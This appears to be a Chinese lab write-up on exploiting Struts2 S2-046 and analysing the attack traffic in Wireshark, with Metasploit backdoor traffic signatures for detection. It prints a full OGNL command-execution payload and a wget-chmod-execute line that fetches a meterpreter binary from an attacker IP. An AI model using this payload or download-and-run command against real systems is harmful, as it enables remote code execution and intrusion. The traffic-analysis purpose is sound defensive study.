红日复现为什么失败之struct-046流量分析加msf特征总结

news/2025/1/4 7:50:52/文章来源:https://www.cnblogs.com/maxwellf/p/18241526

struts2漏洞

一、指纹识别

s2的url路径组成(详见struts.xml配置文件):name工程名+namespace命名空间+atcion名称+extends拓展名

部署在根目录下,工程名可为空;当然namespace名称也可设置为空;拓展名也可设置为空。

方法一
(1)url会有.action或.do后缀文件名(eg:http://192.168.xx.xx/integration/editGangster.action)    #但是不准确,因为spring框架或jboss框架有可能也存在.do文件
(2)在.action等接口后追加actionErrors参数或者输入错误路径,s2应用会触发报错,通过网页回显报错信息判断。s2常见报错关键词:no action mapped、org.apache.struts2.views.jsp、namespace、no result defined for action等   #spring报错关键词一般含有whitelabel Error Page等方法二
在URL添加/struts/domTT.css,返回css代码  #在工程名后路径添加,就是网站根目录下,返回结果如下图一方法三
在url每层路径前添加一个错误路径,如果回显相同结果则是s2,不同结果则是spring框架   #按照s2框架规则,层层向上查找action,但是存在nginx时nginx规则优先。

图一如下

image-20240607110906342

二、漏洞利用的流量分析

1.使用检测工具

image-20240611100643222

使用工具检测wireshark: 
tcp.port == 2001 && http    #首先筛选特殊端口加协议
http.request.method == POST    # 查看请求方法为post的数据
http.request.code >= 400    #查看响应码为200
ip.src == 192.168.0.112    #指定源IP为攻击ip,查看data数据

image-20240611111152801

image-20240611152234377

2.使用手工注入

1.sumbit发送
2.使用bp抓包
3.构造payload内容如下:
"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\x00b"
4.修改hex构造00截断   #如下图

image-20240611104713378

image-20240611104733263

wireshark语句查找:
# 未发包前先看一下目标ip的数据   ip.dst == 192.168.0.110   #结果显示无
# bp在send后,再次查看目标ip数据  ip.dst == 192.168.0.110  #如下图一
http contains "/doUpload"   #如下图二

图一如下

image-20240611152818161

图二如下

image-20240611154302490

image-20240611110629556

三、getshell的流量分析

使用msf进行getshell

1.使用exp模块生成个payload   #该模块表示在本地开启一个端口,目标机在访问攻击机该端口时,会将该端口内的文件读取至本地执行。
use exploit/multi/script/web_delivery
set target 7
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.0.108
set lport 1234
run

image-20240611160044082

image-20240611160216447

生成payload:
wget -qO Tw2nth14 --no-check-certificate http://192.168.0.108:8080/X6e4KuPDZj; chmod +x Tw2nth14; ./Tw2nth14& disown将上述payload进行改造(;替换成&&)
wget -qO Tw2nth14 --no-check-certificate http://192.168.0.108:8080/X6e4KuPDZj&& chmod +x Tw2nth14&& ./Tw2nth14& disown

image-20240611161845965

image-20240611161909985

getshell

image-20240611162007312

追踪它的目标ip以及源ip流
ip.dst == 192.168.0.110 && http    #112发送payload数据到110成功

image-20240611162333825

image-20240611163518830

msf(108攻击机)与目标主机(110目标主机)建立连接

追踪流:ip.src == 192.168.0.108 && ip.dst == 192.168.0.110 && tcp.port == 1234

image-20240612112605452

Data: 653f424b45daa002a50b09a9e1278780fa3b4bcb653f424a653f4223653f424be12cddc4…
000c29a70a60000c29461c210800450000b44c81400040066b98c0a8006cc0a8006e04d2e3ce877c0d962d59db35801801f5fa8100000101080a4f51a65401d43497653f424b45daa002a50b09a9e1278780fa3b4bcb653f424a653f4223653f424be12cddc4934e0530fb9b0bc5a8397ccf0a3cad5073c4ab7f0ae695a177ca7f8217a426b3e070424b771e4cf1d3cb2ee08d41a0079b81ddbbc53fde242c239771da4d012af8a514c5b0f26eee8103ea9ad0171f20ef2006813535f900d8f5dbc5

四、msf后门流量特征

msf后门三种类型:
协议:tcp、http、https
位数:默认生成后门32位(windows/shell/reverse_tcp),但是可以生成64位(windows/x64/shell/reverse_tcp)
模式:shell、meterpreter
连接:正向、反向(bind reverse)以下用windows举例:
tcp流量:
eg:windows/shell/reverse_tcp
该流量包特征:异常端口持续传输数据、shell后门明文传输(在追踪流中可查看具体命令)
可以直接看到命令用于反制
eg:windows/meterpreter/reverse_tcp     #如下图一
该流量包特征:异常端口持续传输数据、meterpreter后门进行加密
exe文件:文件头16进制是MZ开头http流量:
数据包特征:固定请求和响应模板
请求模板包括UA、host、Connection、Cache-Control
响应模板包括content-Type、Connection、Server、Content-Length后门set编码模块,在特征上与不编码有一定区别(比如文件体开头部分MZ ../等特征替换成..  .. ..等)但是数据包依旧有如上特征。https流量:
server hello的JA3值固定  6523.... /22...

图一如下

image-20240613165638799

image-20240613210440823

image-20240613210412086

image-20240613210519444

五、参考文献:

红队第2篇:区分Spring与Struts2框架的几种新方法-腾讯云开发者社区-腾讯云 (tencent.com)

Struts2框架漏洞总结与复现(下)_s2-029-CSDN博客

https://github.com/abc123info/Struts2VulsScanTools #漏洞利用工具

msf中exploit的web_delivery模块 - 白桦林_HK - 博客园 (cnblogs.com)

msf后门流量分析_msf meterpreter流量检测-CSDN博客

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/724499.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

红日复现为什么失败之struct漏洞复现

struts2漏洞 一、指纹识别 s2的url路径组成(详见struts.xml配置文件):name工程名+namespace命名空间+atcion名称+extends拓展名部署在根目录下,工程名可为空;当然namespace名称也可设置为空;拓展名也可设置为空。 方法一 (1)url会有.action或.do后缀文件名(eg:http://…

使用getaddrinfo函数来获取并打印出www.baidu.com的所有IP地址(IPv4和IPv6)

#include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <arpa/inet.h>int main() {struct addrinfo hints, *res, *p;int status;char ipstr[INET6_ADDRSTRLEN];// 设置h…

C138 线段树分治 P2056 [ZJOI2007] 捉迷藏

视频链接:C138 线段树分治 P2056 [ZJOI2007] 捉迷藏_哔哩哔哩_bilibili P2056 [ZJOI2007] 捉迷藏 - 洛谷 | 计算机科学教育新生态 (luogu.com.cn)// 线段树分治 O(nlognlogn) #include <iostream> #include <cstring> #include <algorithm> #include <…

[lnsyoj118/luoguP3369]普通平衡树

平衡树 Treap题意 维护一个数据结构,要求支持插入,删除,根据排名查数,根据数查排名,查询前驱,查询后继\(6\)个操作 sol 考虑到后四个查询的操作,会发现使用二叉搜索树(BST)完全可以实现 为了完成这四个操作,需要在每个节点记录\(3\)个值:\(key\) 表示当前节点的数 \(c…

牛客周赛46(思路待补)

比赛链接:牛客周赛46赛时感受 本场参加的是内测,多亏了内测群的佬提供的思路,得以AK。 ABC都是简单的签到题,D稍微需要分类一下,EF有点算法知识,E可以使用前缀和+二分搜索过掉,但是听说好像还能使用离散化树状数组等等,F是数学知识,隔板法和求质数、求组合…

[TinyRenderer] Chapter1 p3 Line

(注:本小节不是对划线算法事无巨细的证明,如果你需要更加系统的学习,请跳转至文末的参考部分) 如果你是一名曾经学习过图形学基础的学生,那么你一定对画线算法稔熟于心,中点划线算法,Bresenham算法。其中,现代光栅化器中使用最多的就是Bresenham算法,它以去除了除法和…

3个月搞定计算机二级C语言!高效刷题系列进行中

前言 大家好,我是梁国庆。 计算机二级应该是每一位大学生的必修课,相信很多同学的大学flag中都会有它的身影。 我在大学里也不止一次的想要考计算机二级office,但由于种种原因,备考了几次都不了了之。 这一次我想换个目标! 备考计算机二级C语言 今天山东省考试院发布了关于…

讯飞有一个可以根据描述文本自动生成PPT的AI接口,有趣

文档:https://www.xfyun.cn/doc/spark/PPTGeneration.html 价格方面提供了免费1000点的额度,生成一次是10点,正好100次,如果要购买的话最低要购买1344元的,没有按量付费的模式,个人小开发者可买不起。 让我们跑起来玩玩,官方提供了python的sdk,下载到本地: 不想下载sd…

RSS 解析:全球内容分发的利器及使用技巧

RSS(Really Simple Syndication)是一种 XML 格式,用于网站内容的聚合和分发,让用户能快速浏览和跟踪更新。RSS 文档结构包括 `<channel>` 和 `<item>` 元素,允许内容创作者分享标题、链接和描述。通过 RSS,用户可以定制新闻源,过滤不相关信息,提高效率。RS…

2024.6.10漏洞探针

探针(扫描器) 1、nmap漏洞库,根目录下scripts中调用2、Goby(红队版) 直接输入ip扫描资产,漏洞库较少; 3、Nessus 本地安装: 下载安装普通版;注册获取验证码; 注册用户 nessus,nessus123 漏洞利用 1、工具框架 metasploit和searchsploit 忍者系统可以一键使用msf;2、…

6.12Web应用漏洞发现探针利用

已知CMS、开发框架、 思路: 各个页面查看数据包(地址信息),查看框架,上fofa关键字搜索(查看其框架信息如thinkhphp),利用检测工具测试漏洞情况; 网站根目录下的robots.txt文件信息; /data/admin/ver.txt 网站升级时间; 常见SQL注入、登录、逻辑越权支付逻辑绕过思路:…

6.13API接口服务类漏洞探针

ip地址解析:www.x.x.x.com, 对应网站目录为d:/wwwroot/xiaodi/ 而127.x.x.x,对应网站目录为d:/wwwroot/,可能存在网站备份文件zip,所以ip网址端口都的扫描; 协议端弱口令爆破: 超级弱口令检查工具;端口服务安全问题(用于无思路时) 思路:利用探针对端口探测后,对口令安全…